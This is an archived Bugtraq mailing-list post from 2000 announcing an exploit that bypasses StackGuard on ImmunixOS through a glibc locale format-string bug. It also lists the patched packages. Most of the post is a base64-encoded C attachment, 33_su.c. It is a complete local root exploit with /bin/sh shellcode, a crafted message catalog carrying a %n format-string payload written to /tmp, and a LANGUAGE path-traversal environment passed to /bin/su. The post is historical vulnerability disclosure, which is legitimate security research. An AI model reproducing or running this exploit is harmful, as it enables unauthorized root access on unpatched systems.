[16837] in bugtraq
glibc/locale sploit for ImmunixOS
daemon@ATHENA.MIT.EDU (Mariusz Woloszyn)
Wed Sep 20 01:32:36 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="429728448-1344897100-969398118=:8559"
Message-Id: <Pine.LNX.4.04.10009192210440.8559-200000@dzyngiel.ipartners.pl>
Date: Tue, 19 Sep 2000 23:15:18 +0200
Reply-To: Mariusz Woloszyn <emsi@IPARTNERS.PL>
From: Mariusz Woloszyn <emsi@IPARTNERS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <C1256953.0042781F.00@avimsi01.retevision.es>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--429728448-1344897100-969398118=:8559
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Content-Transfer-Encoding: QUOTED-PRINTABLE
I just developed the first publicly known sploit that bypases StackGuard
protection in real world. I decided to publish it as the patch for glibc
ImmunixOS is out. It's also the proof of concept described about year ago
in our (my and Bulba's) Phrack article published in May this year.
[http://phrack.infonexus.com/search.phtml?view&article=3Dp56-5]
The sploit is as simple as possible, it does not take any arguments and
produces shell with euid=3D=3D0. All addresses are fixed (stack and env).
The exploiting string overwrites exit() GOT entry and makes it point to
our shellcode (it's sufficient if the stack is executable) just like
we described it in phrack article long time ago :)
The exploit won't work if glibc is patched (ImmunixOS patched glibc can be
found at:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/
glibc-2.1.3-21_StackGuard.i386.rpm
glibc-devel-2.1.3-21_StackGuard.i386.rpm
glibc-profile-2.1.3-21_StackGuard.i386.rpm
nscd-2.1.3-21_StackGuard.i386.rpm).
I would like to remind that by using StackGuarded binaries you're still
adding extra security level that can be bypassed ONLY under certain
circumstances!
Greetings go to all best Polish security specialists!
Regards,
--
Mariusz Wo=B3oszyn
Internet Security Specialist, Internet Partners, GTS Poland
--429728448-1344897100-969398118=:8559
Content-Type: TEXT/PLAIN; charset=ISO-8859-2; name="33_su.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.04.10009192315180.8559@dzyngiel.ipartners.pl>
Content-Description:
Content-Disposition: attachment; filename="33_su.c"
LyogMzNfc3UuYyBleHBsb2l0IGZvciBMQyBnbGliYyBmb3JtYXQgc3RyaW5n
IGJ1Zw0KICAgaXQgd29ya3Mgb24gU3RhY2tHdWFyZGVkIHZlcnNpb24gb2Yg
UkggNi4yDQogICBjYWxsZWQgSW1tdW5peE9TIChodHRwOi8vd3d3LmltbXVu
aXgub3JnLykNCiAgIEV4cGxvaXQgKGMpTGFtM3JaIEdyb3VwIGJ5IEtpbDNy
IG9mIExhbTNyWg0KDQogICBpdCdzIHRoZSBmaXJzdCBwdWJsaWMgc3Bsb2l0
IHRoYXQgYnlwYXNlcw0KICAgU3RhY2tHdWFyZCBwcm90ZWN0aW9uIGluIHJl
YWwgd29ybGQNCiAgIGl0IGlzIGFsc28gYSBwcm9vZiBvZiBjb25jZXB0IGRl
c2NyaWJlZCBsb25nIHRpbWUgYWdvIGluIExhbTNyWidzIFBocmFjaw0KICAg
YXJ0aWNsZSAiQllQQVNTSU5HIFNUQUNLR1VBUkQgQU5EIFNUQUNLU0hJRUxE
IiBieSBCdWxiYSBhbmQgS2lsM3INCiAgIFtodHRwOi8vcGhyYWNrLmluZm9u
ZXh1cy5jb20vc2VhcmNoLnBodG1sP3ZpZXcmYXJ0aWNsZT1wNTYtNV0NCg0K
DQogICBncmVldHo6IHdhcm5pbmczLCBzY3V0LCBzdGVhbHRoLCBidWxiYSwg
dG1vZ2dpZSwgbmlzZXMsIHdhc2lrIChha2Egc3luZWsgOyksDQogICBhbmQg
dGVzbyB0ZWFtLCBMU0QgdGVhbSwgSEVSVCwgcGFkbmlldGEgYmFiY2lhLCB6
MzNkLA0KICAgbGNhbXR1ZiBha2EgcG9zdGF3Zmxhc3prZSwgY2x1YmJpbmcu
cGwsIEx1Y2VrIFNrYWp1b2tlciAod3JhY2FqIGRvDQogICB6ZHJvd2lhISku
DQoNCiAgIFNwZWNpYWwgZ3JlZXRzIGdvIHRvIENyaXNwaW4gQ293YW4NCg0K
ICAgRGlzY2xhaW1lcjogVEhJUyBpcyBMYW0zclogc3R5bGUgKGZhbW91Y2Ug
b25lKS4gTGFtM3J6IHN0eWxlIERPIE5PVA0KICAgZXhwbG9pdCBiYXNoLCBk
byBub3QgdXNlIGJhc2ggYW5kIGRvZXMgbm90aGluZyB0byBkbyB3aXRoIGJh
c2ggc2NyaXB0cyENCiAgIExhbTNyWiBzcGxvaXRzIGRvIG5vdCBsaWtlIHRv
IHRha2UgYW55IGFyZ3VtZW50cyBpdCBjb25mdXNlcyBsYW1lcnMhDQoNCg0K
ICAgcXdlcnR6ID8NCiAgIHplcyAhDQoNCiovDQovLyBsYW1lcjoNCi8vIGNv
bXBpbGUgaXQgYXMgYSByZWd1bGFyIHVzZXIgb24gYSBib3ggYW5kIGl0IHNo
b3VsZCB3b3JrISA6KQ0KDQovLyBsYW0zcjoNCi8vIHJlYWQgdGhlIGNvZGUg
Y2FyZWZ1bGx5IGFuZCBoYXZlIGEgZnVuISA6KQ0KDQoNCiNpbmNsdWRlIDxz
dGRpby5oPg0KDQojZGVmaW5lIEVYSVRfR09UICAgICAgCTB4ODA0YzYyNA0K
I2RlZmluZSBXSEVSRVNIRUxMQ09ERSAgMHhiZmZmZmY4MQ0KDQojZGVmaW5l
IEVOViAgICAgICAgICAgICAiTEFOR1VBR0U9ZmlfRkkvLi4vLi4vLi4vLi4v
Li4vLi4vdG1wIg0KI2RlZmluZSBQQVRIICAgICAgICAgICAgICIvdG1wL0xD
X01FU1NBR0VTIg0KDQoNCg0KY2hhciAqZW52WzExXTsNCmNoYXIgY29kZVtd
PQ0KICAgICAgICAiXHhlYlx4MWZceDVlXHg4OVx4NzZceDA4XHgzMVx4YzBc
eDg4XHg0Nlx4MDdceDg5XHg0Nlx4MGNceGIwXHgwYiINCiAgICAgICAgIlx4
ODlceGYzXHg4ZFx4NGVceDA4XHg4ZFx4NTZceDBjXHhjZFx4ODBceDMxXHhk
Ylx4ODlceGQ4XHg0MFx4Y2QiDQogICAgICAgICJceDgwXHhlOFx4ZGNceGZm
XHhmZlx4ZmYvYmluL3NoIjsNCmNoYXIgaGFja2VyW109Ilx4MjRceGM2XHgw
NFx4MDhceDg5XHg4OVx4ODlceDg5XHgyNVx4YzZceDA0XHgwOFx4ODlceDg5
XHg4OVx4ODlceDI2XHhjNlx4MDRceDA4XHg4OVx4ODlceDg5XHg4OVx4Mjdc
eGM2XHgwNFx4MDhceDQ0XHg0NFx4NDQiOw0KDQptYWluICgpIHsNCmNoYXIg
YnVmWzEwMjRdOw0KRklMRSAqZnA7DQoNCmlmKG1rZGlyKFBBVEgsMDc1NSkg
PCAwKQ0Kew0KcGVycm9yKCJta2RpciIpOw0KfQ0KY2hkaXIoUEFUSCk7DQpp
ZiggIShmcCA9IGZvcGVuKCJsaWJjLnBvIiwgIncrIikpKQ0Kew0KcGVycm9y
KCJmb3BlbiIpOw0KZXhpdCgxKTsNCn0NCg0Kc3RyY3B5KGJ1ZiwiJWQlZCVk
JWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQl
ZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVk
JWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQl
ZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVk
JWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQl
ZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVkJWQlZCVk
QUFBQSUyMjZkJWhuJTEyNmQlaG4lMjU2ZCVobiUxOTJkJWhuIik7DQoNCmZw
cmludGYoZnAsIm1zZ2lkIFwiJSVzOiBpbnZhbGlkIG9wdGlvbiAtLSAlJWNc
XG5cIlxuIik7DQpmcHJpbnRmKGZwLCJtc2dzdHIgXCIlc1xcblwiIiwgYnVm
KTsNCmZjbG9zZShmcCk7DQoNCg0Kc3lzdGVtKCIvdXNyL2Jpbi9tc2dmbXQg
bGliYy5wbyAtbyBsaWJjLm1vIik7DQplbnZbMV09RU5WOw0KZW52WzBdPWNv
ZGU7DQplbnZbMl09aGFja2VyOw0KZW52WzNdPU5VTEw7DQpwcmludGYoIlpB
SkVCSaZDSUUhISFcbkEgdGVyYXogYupkemllc3ogbGW/YbMgaSB0YfFjenmz
IHKxY3prsSFcbiIpOw0KZXhlY2xlKCIvYmluL3N1Iiwic3UiLCItdSIsIE5V
TEwsZW52KTsNCn0NCg==
--429728448-1344897100-969398118=:8559--
